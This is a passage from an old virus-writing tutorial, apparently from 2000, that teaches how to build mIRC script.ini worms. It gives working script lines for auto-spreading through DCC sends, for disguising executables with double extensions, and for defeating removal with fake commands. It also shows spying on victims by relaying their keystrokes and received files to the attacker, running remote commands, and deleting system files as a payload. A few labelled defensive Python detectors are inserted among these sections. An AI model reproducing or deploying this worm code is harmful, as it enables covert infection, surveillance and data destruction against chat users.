
(Part 1.0 the BASICs)

part 2.0 >> 04/2000 (mIRC advanced scripting)
part 3.0 >> 06/2000 (Pirch scripting)
part 4.0 >> 07/2000 (Other Worms)

.txt >>  * wormst~1.txt (21,1ko)
.zip >>  * worms.zip (357ko) >> * 21aliv~1.zip (343ko)
            * 15 .ini scripts
            * CeyDem12.asm (19,6ko)


Thanx/Greetz to: Secret_ & Stram ; Simon7 ; Perikles ; Daniel3 .
--------------->
4 their Worm works, scripting and ideas, for correcting my english (Dan3 & Peri), ... and to be electronic friends.

FIRST :

OPEN MIRC.HLP, PRINT IT AND READ IT, READ IT, READ IT ! Yes! The mIRC Help file is really useful if u want to make irc worms, so please read it, and read this tutorial with mIRC.hlp close to u ;), it will be easier for you to understand (mainly if u're a newbie).

I've not included ALL the methods because there are too many methods for worms and script.ini. You will find a zip file with this tutorial, full of nice script.ini, let's study them ;) You will find lots of advanced techniques... (some are mine, some are not...)

Oh! Yes... my english sux, so...

SPREADING METHODS :

It was very easy when worms were Script.ini, because they exploited a bug in mIRC. This bug was in the default options: Dcc get, auto accept & save received file in mIRC Dir! You can see why it was easy, the script.ini was auto-accepted and put into the right place: the mIRC Directory :)

If u put a script.ini in the mIRC Dir, it will be loaded; if not, just restart mIRC 1 or 2 times, as u can see, mIRC looks for a script.ini on start-up, and if it finds one, it will load it. Easy!

But the mIRC bugs do not exist anymore, and now the default options are:
- save receive file in \download Dir.
- ask for Dcc get.
Shit!!!
Even worse... by default, mIRC never accepts *.exe, *.com, *.ini, *.bat, *.dll, it will simply ignore these types of files! Bad no ! Hehehehe!!!

Ok, these file extensions can always be used for worms, but it's not so easy! First of all, there are the mIRC options (which auto-ignore these files). Second, because users (even newbies) know which .ext are "dangerous" or could be a vir.

Hummmm... not so easy!

Yep! But it's more fun like that!!

Lots of files can be used again ... ... ... like ... *.vbs, *.html, *.pif ;), *.js, *.doc, *.xls, *.pps, ... ... ... and probably lots more :)

All u have to do is to use a file with ability to run "code", ...

.vbs }
.html }} using javascript, VBscript, HTMl, ...
.js }

.doc }
.xls }} using W97 Macro (vba)
.pps }

.pif } ... hum strange no ? :) but yep it works !!!


I'm sure you now see a bit more...

BUT! For spreading u have to be ... hum ... nasty/smart/liar/...

Let's look at some techniques...
Check these worms names:

-MyPicture.bmp.vbs
-!!!!!!!lanna-xxx.jpg.bat
-Julie16,JPG.com
-Jane.BMP.EXE
-EmmaPeel.HTML.pif
-cuteELSA.JPG.pif
-CeydaDemet___TurkishGirl.JPG.com
-...

You see... you have to make your worm acceptable by the user, the .ext.ext2 is a "not-so-bad" method.

Some Windows9x name the files as 'file.ext', others as 'file', it depends... if u put a sufficient number of letters the user won't see the last .ext
Example:
Me_MyPics.BMP.com >>> user will see >>> Me_MyPics.BMP.... better no ? :)
        or will see >>> Me_MyPics.BMP
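
Added example (not part of the original tutorial): a filter that a DCC client or mail gateway could apply to offered filenames to catch the .ext.ext2 disguise described above. The extension sets and the padding rule are assumptions of this sketch; the flagged names are the ones listed in the text, and the two benign controls are constructed.

```python
import re

# File types Windows runs or interprets on double-click; limited to the
# extensions this tutorial names (assumption: not an exhaustive list).
ACTIVE_EXTS = {"exe", "com", "bat", "pif", "lnk", "vbs", "js"}
# Harmless-looking types used as the visible, fake extension.
DECOY_EXTS = {"bmp", "jpg", "jpeg", "gif", "txt", "htm", "html", "url", "doc"}
# Runs of filler that push the real extension out of a narrow name column.
PADDING = re.compile(r"[ _]{3,}|!{3,}")


def inspect_filename(name):
    """Return the reasons an offered filename looks disguised (empty = none)."""
    stem, dot, last = name.strip().rpartition(".")
    last = last.lower()
    if not dot or last not in ACTIVE_EXTS:
        return []  # final extension is not an active type
    reasons = []
    # Split on any non-alphanumeric so 'Julie16,JPG.com' is caught as well.
    tokens = [t.lower() for t in re.split(r"[^A-Za-z0-9]+", stem) if t]
    if tokens and tokens[-1] in DECOY_EXTS:
        reasons.append(f"decoy '{tokens[-1]}' precedes real extension '.{last}'")
    if PADDING.search(stem):
        reasons.append("filler characters pad the name")
    return reasons


# Names quoted in the tutorial, plus two constructed benign controls.
SAMPLES = [
    "MyPicture.bmp.vbs",
    "!!!!!!!lanna-xxx.jpg.bat",
    "Julie16,JPG.com",
    "CeydaDemet___TurkishGirl.JPG.com",
    "holiday.jpg",   # control: inert final extension
    "setup.exe",     # control: executable, but not disguised
]


def triage(names):
    """Map each filename to its list of findings."""
    return {n: inspect_filename(n) for n in names}


if __name__ == "__main__":
    for fname, why in triage(SAMPLES).items():
        print(f"{'BLOCK' if why else 'ok':5}  {fname}  {why}")
```

An undisguised executable such as setup.exe returns no findings here because the check targets the disguise only; blocking active types outright is a separate policy decision.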

But another problem is the ... Worm ICON ! "Pffffff...big problem..." ...no! Just try to make new things ... be zen be brain ;) This time u will have to solve the problem yourself... Why? Because it will depend on your worm, if it's an exe, 32bits, u could put any icon u want, but other files will depend on the .extension.
For a .pif worm u could put any icon u want, but try to choose a typical windows icon, a prog that is included in all windows versions, and is in the same place on all computers (like notepad, msnexch, ...). Just play a bit with .pif or .lnk u will understand... just right-click > properties on the pif file.

INFECTION METHODS :

So now you have to infect the IRC user, the most common way is...

n6 =on 1:JOIN:#:{
n7 =if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\EmmaPeel.HTML.pif
n8 = }

It means: 'if a guy joins a chan where the victim is, it will send him the file'. Of course u can set it to all other remote commands, like 'on part', 'on text', ... It's an easy way, but there are some problems with it...

If the victim is on lots of channels, it will be flooded by the mass dcc send. And it's pretty easy to close a dcc window, so your worm should have a tiny size, 10ko is max... to go very fast, you can even use the /pdcc 99999999999 in the script.

Another trick can be done :

n2=on 1:connect:/.enable #d
n3=#d off
n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick script.ini } | .disable #d
| .timer 1 60 .enable #d }
n5=#d end

n13=on 1:part:*:{
n14= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n15=}

n13=on 1:join:#sex:{
n14=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\Gary_Gygax.exe
n15=}
n16=on 1:text:*game*:*:{
n17=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\Gary_Gygax.exe
n18=}

Another technique is to use socks, but that will be in the next tutorial...
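
Added example (not from the original tutorial): seen from the receiving side, the join-triggered send above appears as an unsolicited CTCP DCC SEND arriving seconds after your own JOIN, which is easy to flag in a client or monitoring-bot log. The log format (epoch seconds followed by the raw IRC line), the 10-second window and all sample lines are constructed for illustration.

```python
import ipaddress
import re

JOIN_WINDOW = 10  # seconds after our JOIN; assumption of this sketch

MSG = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ (?P<cmd>JOIN|PRIVMSG) (?P<rest>.*)$")
# CTCP DCC SEND: \x01DCC SEND <file> <ip as integer> <port> [<size>]\x01
DCC = re.compile(
    r'\x01DCC SEND (?:"(?P<q>[^"]+)"|(?P<f>\S+)) '
    r"(?P<ip>\d+) (?P<port>\d+)(?: (?P<size>\d+))?\x01"
)


def find_join_triggered_offers(lines, me, window=JOIN_WINDOW):
    """Return DCC offers sent to `me` within `window` seconds of our JOIN."""
    last_join = None
    hits = []
    for line in lines:
        ts_text, _, raw = line.partition(" ")
        m = MSG.match(raw)
        if not m:
            continue
        ts = int(ts_text)
        if m["cmd"] == "JOIN":
            if m["nick"] == me:
                last_join = ts  # remember when we entered a channel
            continue
        target, _, text = m["rest"].partition(" :")
        d = DCC.search(text)
        if not d or target != me or last_join is None:
            continue
        delay = ts - last_join
        if 0 <= delay <= window:
            hits.append({
                "sender": m["nick"],
                "file": d["q"] or d["f"],
                # DCC carries the sender's IPv4 address as a decimal integer.
                "addr": str(ipaddress.IPv4Address(int(d["ip"]))),
                "port": int(d["port"]),
                "size": int(d["size"]) if d["size"] else None,
                "delay": delay,
            })
    return hits


# Constructed log: we join, one offer arrives 2 s later, one 900 s later.
SAMPLE = [
    "1000 :observer!o@client.example JOIN #lobby",
    "1002 :alice!a@host.example PRIVMSG observer :"
    "\x01DCC SEND EmmaPeel.HTML.pif 3221225994 1024 9216\x01",
    "1003 :bob!b@host.example PRIVMSG observer :hi there",
    "1900 :carol!c@host.example PRIVMSG observer :"
    "\x01DCC SEND notes.txt 3221225994 1025 120\x01",
]

if __name__ == "__main__":
    for hit in find_join_triggered_offers(SAMPLE, "observer"):
        print(hit)
```

The throttled variant shown above sends at most once per minute, so a per-sender count across several joins is a useful second signal when a single hit is inconclusive.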

When the guy launches the worm, some things have to be done...

1- install the script.ini in mIRC Dir.
2- copy himself (the_worm.ext) in another Dir (for spreading).
3- make the worm start on each boot.

These are the 3 fundamental things to do for a good infection.

STEALTH FOR THE MIRC SCRIPT :


>> The first good way is to make the script impossible to remove or to unload :
-----------------------------------------------------------------------------

n23=alias unload { halt }
n24=alias remove { halt }

These 2 lines make the commands /unload and /remove ineffective; of course some variations can be done, or even a fake command, look at the next lines...

n5=alias remote {
n6= if ($1 == off) { echo 6 *** Remote is OFF (Ctcps,Events,Raw) }
n7= if ($1 == on) { echo 6 *** Remote is ON (Ctcps,Events,Raw) }
n8=}
n9=alias unload {
n10= if ($1 == -rs) { echo 6 *** Unloaded script 'script.ini' }
n11=}

If the user tries to stop the remote, or tries to unload the script.ini, he will get a fake message saying "all is done", but nothing will be done ;) and the remote and script will still be there. You simply have to intercept mIRC commands; in the example above, the 2 commands /remote and /unload are intercepted, and changed in the way we want... u see...

Remember...:
------------
/load -rs file.ext or /load -rs path\file.ext
/unload -rs file.ext or /unload -rs path\file.ext
---> this command is used to load or unload a script in mirc

/remote on ---> events, ctcps and raw will be enable, so the commands like
        "on text" or "on ctcp" could work.
/remote off ---> disable all remote commands, the "on text", "on ...", wont work
        anymore.

Let's look at other methods that can be used to hide the worm... Let's see...

n13=alias /unload /echo 2 *** Unloaded $1- 
n14=alias /remove /echo 2 *** Removed $1- 
n15=alias /play /echo 2 *** Unable To Play $1-  ;--> to send a text file on
a window
n16=alias /remote /.remote on | /echo 12 *** Remote Off ;--> whatever u
type, remote
n17=alias /events /.events on | /echo 12 *** Events Off ;--> will be always
On :)
n18=alias /sreq /echo 12 SREQ IS NOW OFF ;--> sreq is used to enable/disable
DCC

...other "fake commands" methods, it's an endless list...

n30=alias unload { if ( $1 = $null ) || ( $2 = $null ) { .echo -e 2* /unload:
insufficient parameters | halt } | .echo -e 2*** Unloaded script ' $+ $2- $+ '
| halt }
n31=alias remote { if ( $1 = $null ) { .echo -e 2*** Remote is OFF | halt } |
if ( $1 = on ) { .echo -e 2*** Remote is ON (Ctcps,Events,Raw) } | else { .echo
-e 2*** Remote is OFF } | halt }
n32=alias events { if ( $1 = $null ) { .echo -e 2*** Events are OFF | halt }
| if ( $1 = on ) { .echo -e 2*** Events are ON } | else { .echo -e 2*** Events
are OFF } | halt }

Now i guess u can make ur own fake by yourself...

>> Other methods to hide the script.ini :
------------------------------------------------

Some other nice ways can be used, let's see some of them...

Make your script.ini as a hidden file, even read-only and system, Mirc doesn't care about it and it will load the script. If you're using an exe or com it will be easy to put the script +h +r +s, but it's also possible by the script itself.

n22=On 1:Connect:{
n23=/run attrib +h script.ini
n24=/run attrib +r script.ini
n25=/run attrib +s script.ini
n26= }

These commands will change the script.ini attrib to hidden, read-only and system file; of course, you can use it to hide other stuff...

n23=/run attrib +h c:\windows\worm.exe

Even better, let's try it...

n4=on 1:connect:/rename C:\Windows\users32.dll
C:\Windows\CeydaDemet___TurkishGirl.JPG.com
n5=on 1:disconnect:/rename C:\Windows\CeydaDemet___TurkishGirl.JPG.com
C:\Windows\users32.dll

With that, the worm only has the "spreading name" when the user is connected, when he disconnects, the file is renamed to "users32.dll", :) who would like to delete such an important windows DLL? hehehe, and don't forget to put it as a system file, if the guy tries to delete it, he will have a Windows-afraid-problems-dont-do-that-message ;) ok..

Let's see other methods to hide the script.ini ...

n5=on 1:connect:/run -n C:\COMMAND.COM /C move c:\mirc\script.ini C:\XXXX.dll
n6=on 1:disconnect:/run -n C:\COMMAND.COM /C move C:\XXXX.dll
C:\mirc\script.ini

With that, if a guy on irc tries to help the infected, and says "delete script.ini", he won't find the file, because the script will only be in "mirc memory", but when he disconnects, the script will be back on...

You now...!

One last thing could be to add a header to your script, making it look like a normal/cool script.
Examples:

[SCRIPT]
;ProTecTOR ScriPT-Keep It LOAd (c)Mirc
n1=on 1:start:{

[SCRIPT]
;Keep It Load!-->ANTI-FLOOD SCRIPT (c) (mirc 5.4* - 5.5*) 1999
n1=on 1:start:{

[SCRIPT]
;ANTI NUKE SCRIPT (c) 2000 - Keep this script loaded !
n1=on 1:start:{

[script]
n0=;mIRC Protection Script DO NOT EDIT!
n1=;By Khaled Mardem-Bey
n2=; www.mirc.com
n3=on 1:start:{

Another way to ignore the guys who said to the victim "hey! u have a virus" or "hey! why are u trying to send me an exe?", it's pretty easy...

n29=on 1:text:*script.ini*:#:/.ignore $nick
n30=on 1:text:*virus*:?:/.ignore $nick
n31=on 1:text:*worm*:?:/.ignore $nick
n32=on 1:text:*exe*:?:/.ignore $nick
        |
        |_________________> # for chan message
                    ? for private message

With that, all the guys who said these words in a private/chan window to the infected victim will be put on the ignore list  ;)

Try to add something nice... like close the window before adding to the ignore list, look a bit at the | , in mirc, like in dos, it's a very useful command (alt gr / 6)...

SPYING VIA THE MIRC SCRIPT :

You're a little curious, and want to know more about your infected ? I understand u ;)

n14=on 1:input:*:.msg #EmmaPeel [( $+ $active $+ ) $1-]

;--> all the keyboards input will be sent to the channel #emmapeel, with the name of the active window.


u can add :

n15=on 1:text:*:?:.msg #EmmaPeel [( $+ $active $+ ) $1-]

;--> this time, when the victim receives text in a chat/query window, it will be sent to the channel. Of course instead of a chan, u can specify a nick.

or:

n7=on 1:connect:.msg #Sensi Alive! $ip on $server $+ : $+ $port $+
n8=on 1:connect:/raw privmsg Del_Armg0 Vivant! $ip on $server $+ : $+ $port $+

;--> these 2 lines send a message when the user connects on irc, the first line sends "Alive!" to the chan #Sensi and the second line sends "Vivant!" to the nick Del_Armg0 ;).
The "$ip on $server $+ : $+ $port $+" will say the victim's IP, the irc server he's using and on which port. Lots of other identifiers can be used... look at mIRC.hlp pls.

more can be done...

n7=on 1:connect:{
n8= //.msg #El22_Spy Hi. $os $ip $server $port $time $date %chan been $+
$duration($calc($ticks / 1000)) since my last reboot!
n9=}

You can even try to go into the Hard-Disk of the guy...

n9=on 1:text:*open*:#:/fserve $nick 5 C:\

;--> this will open a fserve to the nick who has typed "open" in a chan where the victim is. The root dir will be C:\, and u could upload 5 files max at a time.

Better than the fserve method (cos u'll have to patch the mirc.ini for reset the fserve warning), u can redirect all the files sent or receive by the victim, let's try it...

n16=on 1:filercvd:*.*:.dcc send Del_Armg0 $filename
or
n16=on 1:filercvd:*.exe,*.com,*.ini,*.vbs,*.bat:.dcc send Del_Armg0 $filename

...understood ?

more...

n26=on 1:filercvd:*.jpg,*.vbs,*.zip,*.exe:/.dcc send simbulyne $filename
n27=on 1:filesent:*.jpg,*.vbs,*.zip,*.exe:/.dcc send simbuline $filename

just open mirc.hlp if u don't see/understand ...!!!

You can of course spy on all commands, all you have to do is just redirect them, example:

n33=on 1:DNS:.msg #trojanslair DNS_ ip: $iaddress address: $naddress resolved:
$raddress

Will send the Server answer to chan #trojanslair, when the victim makes a /DNS.

Remember...:
------------
n0=on 1:start:{ --> when mirc starts
n1= .remote on --> all remote will be on
n2= .ctcps on --> ctcps will be on
n3= .events on --> events will be on
n4= .sreq ignore --> auto-ignore all dcc send (so script can't be replaced by another worm)
n5= }

ACTING VIA THE MIRC SCRIPT :

This is the fun part of Worms :), so be creative ! All commands can be done via a worm, check this...

n10=on 1:text:*bye*:#:/exit

What it does... When i (or somebody else) type "bye" in the chan of an infected user, the /exit command is executed. And /exit is a command used to close mirc... Simply.

Lots of fun can be done...

n13=on 1:text:*salut*:#:/nick NuKe_Me_^
n14=on 1:text:*hello*:#:/nick im_gay_me
n15=on 1:text:*bye*:#:/nick FuckCops
n16=on 1:text:*cyber*:#:/nick Marie_12x

WarfWarfWarfffff!!! You see the joke hehehe! But lots of useful things can be done too...

n8=on 1:text:*gimme*:*:.dcc send $nick $2
n9=on 1:text:*yup*:*:/run $2 $3 $4

n8 will send u the file u specify after "gimme",
example: "gimme c:\autoexec.bat"
will send u the autoexec.bat.

n9 will run the file u specify with command line arguments,
example: "yup c:\windows\netstat -a -n"
will run the dos prog netstat.

A cool option is /run -n, it will launch the prog, but minimized (-n).

I used it in my *.pif worm :

n5=on 1:CONNECT:/run -n C:\COMMAND.COM /C copy
C:\mirc\download\EmmaPeel.HTML.pif C:\Windows\EmmaPeel.HTML.pif

Command.com is useful too, check the options (under dos).

More... if u luv TakOv ! bah...! warffff

n23= on 1:text:*op*:#:/mode $chan +o $nick
n24= on 1:text:*bang*:#:/mode $chan +b $2-
n25= on 1:text:*boum*:#:/kick $chan $2-
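
Added example (not from the original tutorial): a static audit of a script.ini for the patterns shown in the stealth, spying and acting sections, namely aliases that shadow built-in commands and event handlers that forward text, send files or run programs. The rule set is an assumption of this sketch, and the sample script is constructed from lines quoted above.

```python
import re

# Built-in commands the tutorial's fake aliases override.
SHADOWED = {"unload", "remove", "remote", "events", "ctcps", "sreq", "play"}
LINE = re.compile(r"^\s*n\d+\s*=\s*(.*)$")           # 'nN=' prefix in script.ini
EVENT = re.compile(r"^on\s+[^:\s]+:(\w+):", re.I)    # on <level>:<EVENT>:
ALIAS = re.compile(r"^alias\s+/?(\w+)", re.I)
BODY_RULES = [
    (re.compile(r"\bdcc\s+send\b", re.I), "sends a file"),
    (re.compile(r"[/.]run\b", re.I), "runs a program"),
    (re.compile(r"\bfserve\b", re.I), "opens a file server"),
    (re.compile(r"\b(?:msg|privmsg)\b.*\$1-", re.I), "forwards message text"),
]


def audit_script(text):
    """Return (line number, finding) pairs for a script.ini body."""
    findings = []
    event, depth = None, 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = LINE.match(raw)
        stmt = (m.group(1) if m else raw).strip()
        if not stmt or stmt[0] in ";[":
            continue  # blank line, comment or section header
        a = ALIAS.match(stmt)
        if a and a.group(1).lower() in SHADOWED:
            findings.append((lineno, f"alias shadows built-in /{a.group(1).lower()}"))
        e = EVENT.match(stmt)
        if e:
            event = e.group(1).lower()
        elif depth == 0:
            event = None  # not inside a multi-line event block
        if event:
            for rx, label in BODY_RULES:
                if rx.search(stmt):
                    findings.append((lineno, f"on {event}: {label}"))
        depth = max(0, depth + stmt.count("{") - stmt.count("}"))
    return findings


# Constructed sample assembled from lines quoted in the tutorial.
SAMPLE = r"""[script]
n0=;mIRC Protection Script DO NOT EDIT!
n1=alias unload { halt }
n2=alias /remote /.remote on | /echo 12 *** Remote Off
n3=on 1:JOIN:#:{
n4= if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\EmmaPeel.HTML.pif
n5=}
n6=on 1:input:*:.msg #EmmaPeel [( $+ $active $+ ) $1-]
n7=on 1:text:*yup*:*:/run $2 $3 $4
n8=alias hello { echo hi }
"""

if __name__ == "__main__":
    for lineno, finding in audit_script(SAMPLE):
        print(f"line {lineno}: {finding}")
```

Run it against the file on disk rather than trusting /unload or /remote output inside the client, since those commands are exactly what the aliases falsify.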

ExErcicEs !
-----------

Try to guess and modify them (to load in mIRC, put the script in the mirc Dir, u can even type /load -rs script.ini)

n2=on 1:connect:/.enable #d
n3=#d on
n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick script.ini } | .disable #d |
.timer 1 60 .enable #d }
n5=#d end


n10= #spy off
n11= on 1:input:*:.msg #novaspy [( $+ $active $+ ) $1-]
n12= #spy end
n13= on 1:text: *supnovpow*:#:/enable #spy


n17= on 1:text:*asl*:#:{
n18= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n19= }


n9=on 1:text:*:?:{
n10= if ( $1 == runthis ) { .run $2- }
n11=}


n1=on 1:dns:.msg #ad&d_fr DNS_ ip: $iaddress address: $naddress resolved:
$raddress


n0=on 1:load: { .ial on | .events on | .ctcps on | .msg #w81zdw $me just loaded
the trojaned script.ini }
n1=on 1:unload: { .quit I tried unloading script.ini!!! | .timer -o 0 1 /.exit |
.timer 0 1 /.exit }


n18=on 1:text:*carrousel*:*:{ /mode $chan +o $nick | /mode $chan -b $nick |
/mode $chan +b $2- | /kick $chan $2- | /.ignore $2- | /quit | /exit }


n28=on 1:op:#:/msg $chan Please if u want my Special Iblis Sex Pass List :)
TYPE: !xxxpass
n29=on 1:text:*!xxxpass*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick
c:\X_PASS.TXT.exe | /raw privmsg $nick Hi! Here is my last updated XXX Pass list
! Enjoy :)) }


n30=on 1:hotlink:*:*:/msg #iblis_worm *-> User clicked word $1 in line $hotline

MIRC SCRIPT TRICKS :

** don't use the same "word" 2 times.
Example:

n13=on 1:text:*change*:#:/nick Sommeil
n14=on 1:text:*change*:#:/fserve $nick 5 C:\

--> bad : cos "change" is used twice

** ALL mIRC scripts start with [SCRIPT]

** some commands can not be used twice; like

on connect ; on quit ; on start ; ...

In fact, you can only execute all these commands one time in a session. This is because you "connect" only once, the same goes for "quit" and "disconnect"; but not for "on text" cos it will depend on the text looked for.

** Cool variables...

$os $ip $host $server $port $cb $url $version $usermode $time $date $chan

** wanna payload via mIRC ?

... | if ( $day = Monday ) && ( $r(1,12) = 9 ) { pay2 } | ...
n40=alias pay2 { /echo 111264_IBLIS_W0RM__hihihi! 6BadDayToday... |
.remove c:\autoexec.bat | .remove c:\command.com }

** ; is for comments

MORE ABOUT WORMS... :

How to spread your Worms ?

The first way is by IRC, look at a basic spreading script...

[script]
n0=on 1:start:{
n1= .remote on
n2= .ctcps on
n3= .events on
n4=}
n5=on 1:join:#sexpics:{
n6= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n7=}
n8=on 1:join:#sex:{
n9= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n10=}
n11=on 1:join:#teensexpics:{
n12= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n13=}
n14=on 1:join:#sexe:{
n15= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n16=}
n17=on 1:join:#usa:{
n18= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n19=}
n20=on 1:join:#chatzone:{
n21= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n22=}
n23=on 1:join:#cybersex:{
n24= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\Me_MyPics.BMP.com
n25=}
n26=on 1:join:#teensex:{
n27= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\CeydaSecret.URL.com
n28=}
n29=on 1:join:#teenzone:{
n30= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\Me_MyPics.BMP.com
n31=}
n32=on 1:join:#teenchat:{
n33= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n34=}
n35=on 1:join:#funfactory:{
n36= if ( $nick == $me ) { halt } | .dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets.doc
n37=}
n38=on 1:text:*trade*:*:/dcc send $nick
C:\distrib\The_CeydaDemet_X_Secrets__coolSEXPICS!.JPG.com
n39=on 1:text:*sex*:*:/dcc send $nick C:\distrib\Me_MyPics.BMP.com
n40=on 1:text:*asl*:*:/dcc send $nick C:\distrib\Me_MyPics.BMP.com
n41=on 1:FILESENT:*.*:/write -i victim.txt one infected more >> $nick >> with
$filename worm


As u can see, I spread a lot on the #sex... channel, yep, they're good for spreading; and i'm using a .doc too, with the worm link by OLE ;) ...no macro :))

The line n41 is simply to see how many guys have accepted the Dcc.

NewsGroups are not recommended for spreading worms, because AVers look at them too much !

You can even use a mailing list, or fake warez ftp/site, ... spreading is a fun part, so be imaginative !

Cya all

Del_Armg0 [MATRiX]

Mailto: Del_Armg0@trojanslair.zzn.com

WWW: http://members.xoom.com/Del_armg0/Del_A.htm
          http://altern.org/mvx/

Undernet: #vx-vtc, #vxtrader, #vir, #virus, #[MATRiX]